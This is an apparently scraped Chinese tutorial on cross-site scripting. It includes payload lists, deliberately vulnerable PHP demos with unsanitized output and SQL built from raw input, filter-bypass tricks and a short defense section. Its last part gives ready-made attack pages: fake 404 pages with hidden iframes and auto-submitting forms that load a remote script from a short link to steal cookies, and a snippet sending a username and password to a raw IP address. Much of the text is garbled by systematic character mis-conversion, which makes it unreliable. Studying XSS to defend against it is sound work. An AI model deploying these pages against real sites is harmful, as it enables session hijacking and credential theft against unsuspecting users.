XSS(跨站脚本攻击)详解
目录javascript
XSS的原理和分类php
XSS的攻击载荷css
XSS能够插在哪里? html
XSS漏洞的挖掘 前端
XSS的攻击过程java
XSS漏洞的危害mysql
XSS漏洞的简单攻击测试jquery
反射型XSS:web
存储型XSS:sql
XSS的原理和分类
跨站脚本攻击XSS(Cross Site Scripting),为了避免和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击!
XSS分为:存储型 、反射型 、DOM型XSS
存储型XSS:存储型XSS,持久化,代码是存储在服务器中的,如在我的信息或发表文章等地方,插入代码,若是没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易形成蠕虫,盗窃cookie
反射型XSS:非持久化,须要欺骗用户本身去点击连接才能触发XSS代码(服务器中没有这样的页面和内容),通常容易出如今搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。
DOM型XSS:不通过后端,DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞,DOM-XSS是经过url传入参数去控制触发的,其实也属于反射型XSS。 DOM的详解:DOM文档对象模型
可能触发DOM型XSS的属性
document.referer window.name location innerHTML documen.write
如图,咱们在URL中传入参数的值,而后客户端页面经过js脚本利用DOM的方法得到URL中参数的值,再经过DOM方法赋值给选择列表,该过程没有通过后端,彻底是在前端完成的。因此,咱们就能够在咱们输入的参数上作手脚了。
XSS的攻击载荷
<script>标签:<script>标签是最直接的XSS有效载荷,脚本标记能够引用外部的JavaScript代码,也能够将代码插入脚本标记中
<script>alert("hack")</script> #弹出hack
<script>alert(/hack/)</script> #弹出hack
<script>alert(1)</script> #弹出1,对于数字能够不用引号
<script>alert(document.cookie)</script> #弹出cookie
<script src=http://xxx.com/xss.js></script> #引用外部的xss
<img>标签:
<img src=1 onerror=alert("hack")>
<img src=1 onerror=alert(document.cookie)> #弹出cookie
<body>标签:
<body onload=alert(1)> <body onpageshow=alert(1)>
video标签:
<video onloadstart=alert(1) src="/media/hack-the-planet.mp4" />
style标签:
<style onload=alert(1)></style>
XSS能够插在哪里?
- 用户输入做为script标签内容
- 用户输入做为HTML注释内容
- 用户输入做为HTML标签的属性名
- 用户输入做为HTML标签的属性值
- 用户输入做为HTML标签的名字
- 直接插入到CSS里
- 最重要的是,千万不要引入任何不可信的第三方JavaScript到页面里!
#用户输入做为HTML注释内容,致使攻击者能够进行闭合绕过
<!-- 用户输入 -->
<!-- --><script>alert('hack')</script><!-- -->
#用户输入做为标签属性名,致使攻击者能够进行闭合绕过
<div 用户输入="xx"> </div>
<div ></div><script>alert('hack')</script><div a="xx"> </div>
#用户输入做为标签属性值,致使攻击者能够进行闭合绕过
<div id="用户输入"></div>
<div id=""></div><script>alert('hack')</script><div a="x"></div>
#用户输入做为标签名,致使攻击者能够进行闭合绕过
<用户输入 id="xx" />
<><script>alert('hack')</script><b id="xx" />
#用户输入做为CSS内容,致使攻击者能够进行闭合绕过
<style>用户输入<style>
<style> </style><script>alert('hack')</script><style> </style>
XSS漏洞的挖掘
黑盒测试
尽量找到一切用户可控而且可以输出在页面代码中的地方,好比下面这些:
- URL的每个参数
- URL自己
- 表单
- 搜索框
常见业务场景
- 重灾区:评论区、留言区、我的信息、订单信息等
- 针对型:站内信、网页即时通信、私信、意见反馈
- 存在风险:搜索框、当前目录、图片属性等
白盒测试(代码审计)
关于XSS的代码审计主要就是从接收参数的地方和一些关键词入手。
PHP中常见的接收参数的方式有$_GET、$_POST、$_REQUEST等等,能够搜索全部接收参数的地方。而后对接收到的数据进行跟踪,看看有没有输出到页面中,而后看输出到页面中的数据是否进行了过滤和html编码等处理。
也能够搜索相似echo这样的输出语句,跟踪输出的变量是从哪里来的,咱们是否能控制,若是从数据库中取的,是否能控制存到数据库中的数据,存到数据库以前有没有进行过滤等等。
大多数程序会对接收参数封装在公共文件的函数中统一调用,咱们就须要审计这些公共函数看有没有过滤,可否绕过等等。
同理审计DOM型注入能够搜索一些js操做DOM元素的关键词进行审计。
XSS的攻击过程
反射型XSS漏洞:
- Alice常常浏览某个网站,此网站为Bob所拥有。Bob的站点须要Alice使用用户名/密码进行登陆,并存储了Alice敏感信息(好比银行账户信息)。
- Tom 发现 Bob的站点存在反射性的XSS漏洞
- Tom 利用Bob网站的反射型XSS漏洞编写了一个exp,作成连接的形式,并利用各类手段诱使Alice点击
- Alice在登陆到Bob的站点后,浏览了 Tom 提供的恶意连接
- 嵌入到恶意连接中的恶意脚本在Alice的浏览器中执行。此脚本盗窃敏感信息(cookie、账号信息等信息)。而后在Alice彻底不知情的状况下将这些信息发送给 Tom。
- Tom 利用获取到的cookie就能够以Alice的身份登陆Bob的站点,若是脚本的功更强大的话,Tom 还能够对Alice的浏览器作控制并进一步利用漏洞控制
存储型XSS漏洞:
- Bob拥有一个Web站点,该站点容许用户发布信息/浏览已发布的信息。
- Tom检测到Bob的站点存在存储型的XSS漏洞。
- Tom在Bob的网站上发布一个带有恶意脚本的热点信息,该热点信息存储在了Bob的服务器的数据库中,而后吸引其它用户来阅读该热点信息。
- Bob或者是任何的其余人如Alice浏览该信息以后,Tom的恶意脚本就会执行。
- Tom的恶意脚本执行后,Tom就能够对浏览器该页面的用户发动一块儿XSS攻击
XSS漏洞的危害
从以上咱们能够知道,存储型的XSS危害最大。由于他存储在服务器端,因此不须要咱们和被攻击者有任何接触,只要被攻击者访问了该页面就会遭受攻击。而反射型和DOM型的XSS则须要咱们去诱使用户点击咱们构造的恶意的URL,须要咱们和用户有直接或者间接的接触,好比利用社会工程学或者利用在其余网页挂马的方式。
那么,利用XSS漏洞能够干什么呢?
若是咱们的JS水平通常的话,咱们能够利用网上免费的XSS平台来构造代码实施攻击。
XSS漏洞的简单攻击测试
反射型XSS:
先放出源代码
//前端 1.html:
<html>
<head lang="en">
<meta charset="UTF-8">
<title>反射型XSS</title>
</head>
<body>
<form action="action.php" method="post">
<input type="text" name="name" />
<input type="submit" value="提交">
</form>
</body>
</html>
//后端 action.php:
<?php
$name=$_POST["name"];
echo $name;
?>
这里有一个用户提交的页面,用户能够在此提交数据,数据提交以后给后台处理
因此,咱们能够在输入框中提交数据: <script>alert('hack')</script> ,看看会有什么反应
页面直接弹出了hack的页面,能够看到,咱们插入的语句已经被页面给执行了。
这就是最基本的反射型的XSS漏洞,这种漏洞数据流向是: 前端-->后端-->前端
存储型XSS:
先给出源代码
//前端:2.html
<html>
<head lang="en">
<meta charset="UTF-8">
<title>存储型XSS</title>
</head>
<body>
<form action="action2.php" method="post">
输入你的ID: <input type="text" name="id" /> <br/>
输入你的Name:<input type="text" name="name" /> <br/>
<input type="submit" value="提交">
</form>
</body>
</html>
//后端:action2.php
<?php
$id=$_POST["id"];
$name=$_POST["name"];
mysql_connect("localhost","root","root");
mysql_select_db("test");
$sql="insert into xss value ($id,'$name')";
$result=mysql_query($sql);
?>
//供其余用户访问页面:show2.php
<?php
mysql_connect("localhost","root","root");
mysql_select_db("test");
$sql="select * from xss where id=1";
$result=mysql_query($sql);
while($row=mysql_fetch_array($result)){
echo $row['name'];
}
?>
这里有一个用户提交的页面,数据提交给后端以后,后端存储在数据库中。而后当其余用户访问另外一个页面的时候,后端调出该数据,显示给另外一个用户,XSS代码就被执行了。
咱们输入 1 和 <script>alert(\'hack\')</script> ,注意,这里的hack的单引号要进行转义,由于sql语句中的$name是单引号的,因此这里不转义的话就会闭合sql语句中的单引号。否则注入不进去。提交了以后,咱们看看数据库
能够看到,咱们的XSS语句已经插入到数据库中了
而后当其余用户访问 show2.php 页面时,咱们插入的XSS代码就执行了。
存储型XSS的数据流向是:前端-->后端-->数据库-->后端-->前端
DOM型XSS:
先放上源代码
// 前端3.html
<html>
<head lang="en">
<meta charset="UTF-8">
<title>DOM型XSS</title>
</head>
<body>
<form action="action3.php" method="post">
<input type="text" name="name" />
<input type="submit" value="提交">
</form>
</body>
</html>
// 后端action3.php
<?php
$name=$_POST["name"];
?>
<input id="text" type="text" value="<?php echo $name; ?>"/>
<div id="print"></div>
<script type="text/javascript">
var text=document.getElementById("text");
var print=document.getElementById("print");
print.innerHTML=text.value; // 获取 text的值,而且输出在print内。这里是致使xss的主要缘由。
</script>
这里有一个用户提交的页面,用户能够在此提交数据,数据提交以后给后台处理
咱们能够输入 <img src=1 onerror=alert('hack')> ,而后看看页面的变化
页面直接弹出了 hack 的页面,能够看到,咱们插入的语句已经被页面给执行了。
这就是DOM型XSS漏洞,这种漏洞数据流向是: 前端-->浏览器
XSS的简单过滤和绕过
前面讲sql注入的时候,咱们讲过程序猿对于sql注入的一些过滤,利用一些函数(如:preg_replace()),将组成sql语句的一些字符给过滤,以防止注入。那么,程序猿也能够用一些函数将构成xss代码的一些关键字符给过滤了。但是,道高一尺魔高一丈,虽然过滤了,可是仍是能够进行过滤绕过,以达到XSS攻击的目的。
一:区分大小写过滤标签
先放上源代码
//前端 1.html:
<html>
<head lang="en">
<meta charset="UTF-8">
<title>反射型XSS</title>
</head>
<body>
<form action="action4.php" method="post">
<input type="text" name="name" />
<input type="submit" value="提交">
</form>
</body>
</html>
//后端 action4.php:
<?php
$name=$_POST["name"];
if($name!=null){
$name=preg_replace("/<script>/","",$name); //过滤<script>
$name=preg_replace("/<\/script>/","",$name); //过滤</script>
echo $name;
}
?>
绕过技巧:可使用大小写绕过 <scripT>alert('hack')</scripT>
二:不区分大小写过滤标签
先放上源代码
这个和上面的代码如出一辙,只不过是过滤的时候多加了一个 i ,以不区分大小写
$name=preg_replace("/<script>/i","",$name); //不区分大小写过滤 <script>
$name=preg_replace("/<\/script>/i","",$name); //不区分大小写过滤 </script>
绕过技巧:可使用嵌套的script标签绕过 <scr<script>ipt>alert('hack')</scr</script>ipt>
三:不区分大小写,过滤之间的全部内容
先放上源代码
这个和上面的代码如出一辙,只不过是过滤的时候过滤条件发生了变化
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); //过滤了<script 及其之间的全部内容
虽然没法使用<script>标签注入XSS代码,可是能够经过img、body等标签的事件或者 iframe 等标签的 src 注入恶意的 js 代码。
payload: <img src=1 onerror=alert('hack')>
咱们能够输入 <img src=1 onerror=alert('hack')> ,而后看看页面的变化
XSS的防护
XSS防护的整体思路是:对用户的输入(和URL参数)进行过滤,对输出进行html编码。也就是对用户提交的全部内容进行过滤,对url中的参数进行过滤,过滤掉会致使脚本执行的相关内容;而后对动态输出到页面的内容进行html编码,使脚本没法在浏览器中执行。
对输入的内容进行过滤,能够分为黑名单过滤和白名单过滤。黑名单过滤虽然能够拦截大部分的XSS攻击,可是仍是存在被绕过的风险。白名单过滤虽然能够基本杜绝XSS攻击,可是真实环境中通常是不能进行如此严格的白名单过滤的。
对输出进行html编码,就是经过函数,将用户的输入的数据进行html编码,使其不能做为脚本运行。
以下,是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体
#使用htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体 $name = htmlspecialchars( $_GET[ 'name' ] );
以下,图一是没有进行html编码的,图2是进行了html编码的。通过html编码后script标签被当成了html实体。
咱们还能够服务端设置会话Cookie的HTTP Only属性,这样,客户端的JS脚本就不能获取Cookie信息了
反射型XSS的利用姿式
咱们如今发现一个网站存在反射型XSS,当用户登陆该网站时,咱们经过诱使用户点击咱们精心制做的恶意连接,来盗取用户的Cookie而且发送给咱们,而后咱们再利用盗取的Cookie以用户的身份登陆该用户的网站。
get型
当咱们输入参数的请求类型的get类型的,即咱们输入的参数是以URL参数的形式。以下图
该连接的为:http://127.0.0.1/vulnerabilities/xss_r/?name=<script>alert(/xss/)</script>
那么,咱们要怎么构造恶意代码来诱使用户点击而且用户点击后不会发现点击了恶意连接呢?
咱们构造了以下代码,将其保存为html页面,而后放到咱们本身的服务器上,作成一个连接。当用户登陆了存在漏洞的网站,而且用户点击了咱们构造的恶意连接时,该连接页面会偷偷打开iframe框架,iframe会访问其中的连接,而后执行咱们的js代码。该js代码会把存在漏洞网站的cookie发送到咱们的平台上,可是用户却浑然不知,他会发现打开的是一个404的页面!
<iframe src="http://127.0.0.1/vulnerabilities/xss_r/?name=<script src=https://t.cn/EtxZt8T></script>" style="display:none;"></iframe>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>404 页面不存在 </title>
<style type="text/css">
body{font:14px/1.5 'Microsoft YaHei','微软雅黑',Helvetica,Sans-serif;min-width:1200px;background:#f0f1f3;}
.error-page{background:#f0f1f3;padding:80px 0 180px}
.error-page-main{position:relative;background:#f9f9f9;margin:0 auto;width:617px;-ms-box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:50px 50px 70px}
.error-page-main h3{font-size:24px;font-weight:400;border-bottom:1px solid #d0d0d0}
.error-page-main h3 strong{font-size:54px;font-weight:400;margin-right:20px}
</style>
</head>
<body>
<iframe src="http://127.0.0.1/vulnerabilities/xss_r/?name=<script src=https://t.cn/EtxZt8T></script>" style="display:none;"></iframe>
<div class="error-page">
<div class="error-page-container">
<div class="error-page-main">
<h3>
<strong>404</strong>很抱歉,您要访问的页面不存在!
</h3>
</div>
</div>
</div>
</body>
</html>
而咱们的XSS平台将获得用户的Cookie,而后咱们就能够利用获得的Cookie以用户的身份访问该网站了。
注:咱们的攻击代码能够利用的前提是存在XSS漏洞的网站的X-Frame-options未配置,而且会话Cookie没有设置Http Only属性
post型
咱们如今知道一个网站的用户名输入框存在反射型的XSS漏洞
咱们抓包查看
咱们构造了以下代码,将其保存为html页面,而后放到咱们本身的服务器上,作成一个连接。当用户登陆了存在漏洞的网站,而且用户点击了咱们构造的恶意连接时,该恶意连接的页面加载完后会执行js代码,完成表单的提交,表单的用户名参数是咱们的恶意js代码。提交完该表单后,该js代码会把存在漏洞网站的cookie发送到咱们的平台上,可是用户却浑然不知,他会发现打开的是一个404的页面。
咱们这里写了一个404页面,404页面中隐藏了一个form提交的表单,为了防止提交表单后跳转,咱们在表单下加了一个iframe框架,而且iframe框架的name等于form表单的target,而且咱们设置iframe框架为不可见。
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>404 页面不存在 </title>
<style type="text/css">
body{font:14px/1.5 'Microsoft YaHei','微软雅黑',Helvetica,Sans-serif;min-width:1200px;background:#f0f1f3;}
.error-page{background:#f0f1f3;padding:80px 0 180px}
.error-page-main{position:relative;background:#f9f9f9;margin:0 auto;width:617px;-ms-box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:50px 50px 70px}
.error-page-main h3{font-size:24px;font-weight:400;border-bottom:1px solid #d0d0d0}
.error-page-main h3 strong{font-size:54px;font-weight:400;margin-right:20px}
</style>
<script type="text/javascript">
function attack()
{
document.getElementById("transfer").submit();
}
</script>
</head>
<body>
<iframe src="form.html" frameborder="0" style="display: none"></iframe>
<div class="error-page">
<div class="error-page-container">
<div class="error-page-main">
<h3>
<strong>404</strong>很抱歉,您要访问的页面不存在!
</h3>
</div>
</div>
<form method="POST" id="transfer" action="http://127.0.0.1/xss/action.php" target="frameName">
<input type="hidden" name="username" value="<script src=https://t.cn/EtxZt8T></script>">
<input type="hidden" name="password" value="1">
</form>
<iframe src="" frameborder="0" name="frameName" style="display: none"></iframe>
</div>
</body>
</html>
当用户点击了咱们构造的恶意连接,发现打开的是一个404页面。实际上这个页面偷偷的进行了表单的提交。
而咱们的XSS平台也收到了发送来的数据(这数据中没有Cookie的缘由是这个网站我没设置Cookie,只是随便写的一个页面)。
利用JS将用户信息发送给后台
<!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<title></title>
<script src="https://cdn.staticfile.org/jquery/1.10.2/jquery.min.js"></script>
<script>
$(function(){
//咱们如今假如 user和pass是咱们利用js得到的用户的用户名和密码
user="admin";
pass="root";
url="http://120.79.74.249:8080/?user="+user+"&pass="+pass;
var frame=$("<iframe>");
frame.attr("src",url);
frame.attr("style","display:none");
$("#body").append(frame); //添加一个iframe框架,并设置不显示。这个框架会偷偷访问该连接。
});
</script>
</head>
<body id="body">
<h3>hello,word!</h3>
</body>
</html>
当用户访问了该页面,咱们后台就能够看到用户访问记录。